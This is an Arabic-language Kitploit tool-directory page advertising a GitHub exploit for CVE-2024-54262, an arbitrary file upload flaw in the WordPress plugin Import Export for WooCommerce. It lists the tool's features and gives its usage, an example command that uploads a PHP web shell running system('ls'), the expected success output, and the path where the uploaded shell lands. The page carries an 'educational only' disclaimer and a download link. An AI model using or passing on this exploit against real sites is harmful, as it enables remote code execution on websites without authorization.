Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-54262 — استغلال CVE-2024-54262: رفع ملفات تعسفي في Import Export for WooCommerce | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-54262
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2024-54262

CVE-2024-54262

استغلال CVE-2024-54262: رفع ملفات تعسفي في Import Export for WooCommerce

عرض المستودع
4منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-54262

استغلال CVE-2024-54262: رفع ملفات عشوائي في Import Export for WooCommerce

نظرة عامة

يستغل هذا السكربت ثغرة في إضافة "Import Export for WooCommerce" الخاصة بووردبريس. تسمح الثغرة للمستخدمين غير المصرح لهم برفع ملفات عشوائية، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد (RCE).

الميزات:

  • كشف الإصدار: يتحقق تلقائيًا مما إذا كان موقع ووردبريس يعمل بإصدار إضافة ضعيف.
  • المصادقة: يدعم تسجيل الدخول إلى ووردبريس لمزيد من الاستغلال.
  • رفع الملفات: يسمح برفع ملفات PHP خبيثة لتنفيذ تعليمات برمجية عن بُعد (RCE).

المتطلبات الأساسية:

  1. Python 3.x
  2. مكتبات Python المطلوبة:
    • requests
    • argparse

ثبّت التبعيات باستخدام:

root@kitploit:~
pip install requests

3.تأكد من أن موقع ووردبريس المستهدف يستخدم إصدارًا ضعيفًا من الإضافة.

الاستخدام:

root@kitploit:~
usage: CVE-2024-54262.py [-h] --url URL --username USERNAME --password PASSWORD [--command COMMAND]

Exploit CVE-2024-54262: Arbitrary File Upload in Import Export for WooCommerce

options:
  -h, --help            show this help message and exit
  --url URL, -u URL     Base URL of the WordPress site
  --username USERNAME, -un USERNAME
                        Username for login
  --password PASSWORD, -p PASSWORD
                        Password for login
  --command COMMAND, -c COMMAND
                        PHP shell code to upload

مثال:

root@kitploit:~
 CVE-2024-54262.py --url https://example.com --username admin --password admin --command "<?php system('ls'); ?>"

شرح المخرجات

  1. الموقع قابل للاستغلال.
    • يشير إلى أن موقع ووردبريس يعمل بإصدار إضافة ضعيف.
  2. تم تسجيل الدخول بنجاح.
    • يؤكد نجاح تسجيل الدخول ببيانات الاعتماد المقدمة.
  3. root@kitploit:~
    {
        "status": true,
        "code": 104,
        "message": "Success",
        "data": {
            "file_name": "import_manual_1737090262.php",
            "total_requests": 1,
            "import_columns": "all",
            "product_search_type": "SKU",
            "product_operation": "create_new_update_existing",
            "field_separator": ","
        }
    }
    
    
    
  • اسم الشيل: import_manual_1737090262.php
  • مسار الشيل: wp-content/uploads/import-export-for-woocommerce/product/

إخلاء المسؤولية

هذه الأداة لأغراض تعليمية فقط. المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار يسببها هذا السكربت. الوصول غير المصرح به أو استغلال الأنظمة دون إذن صريح يعد أمرًا غير قانوني وغير أخلاقي.

تنزيل الأداة